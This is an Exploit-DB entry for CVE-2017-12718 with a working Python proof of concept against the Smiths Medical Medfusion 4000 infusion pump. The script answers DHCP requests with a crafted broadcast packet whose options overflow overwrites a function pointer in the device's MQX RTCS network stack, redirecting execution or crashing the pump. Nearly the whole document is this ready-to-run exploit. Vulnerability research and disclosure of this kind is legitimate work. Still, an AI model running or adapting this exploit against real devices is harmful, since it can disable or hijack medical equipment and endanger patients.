Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service

EDB-ID: 43776
Author: Scott Gayou
Published: 2018-01-18
CVE: CVE-2017-12718
Type: Dos
Platform: Hardware
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A 

 """PoC for MQX RTCS code execution via DHCP options overflow. 
  
 This is just a quick hack to prove the vulnerability and was designed to run 
 on a private network with the target device. 
 """ 
  
 import datetime 
 import socket 
  
 def main(): 
     """Use a default valid DHCP packet to overwrite an event function pointer.""" 
     execute_addr = 0xFFFFFFFF 
     exploit_pkt = bytearray.fromhex(' \ 
                     02 01 06 00 a5 d3 0b 2f 00 00 80 00 00 00 00 00 \ 
                     ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff \ 
                     ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 63 82 53 63 \ 
                     35 01 02 36 04 ff ff ff ff 01 04 ff ff ff 00 43 \ 
                     98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \ 
                     00 00 00 00 00 ff ff ff ff ff') 
  
     exploit_pkt[0x195:0x199] = execute_addr.to_bytes(4, byteorder='big') 
  
     recv_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 
     recv_sock.bind(('', 67)) 
  
     send_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 
     send_sock.bind(('', 68)) 
  
     send_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 
     send_sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) 
  
     while True: 
         print("{}: Waiting for DHCP packet...".format(datetime.datetime.now())) 
         # Transaction IDs need to match else RTCS will throw out the packet. 
         data = recv_sock.recvfrom(1024)[0] 
         exploit_pkt[4:8] = data[4:8] 
         send_sock.sendto(exploit_pkt, ('<broadcast>', 68)) 
         print("{}: Transmitted 0x{:X} PC redirection packet.".format( 
             datetime.datetime.now(), execute_addr)) 
  
 if __name__ == "__main__": 
     main()

Source: www.exploit-db.com
Related Posts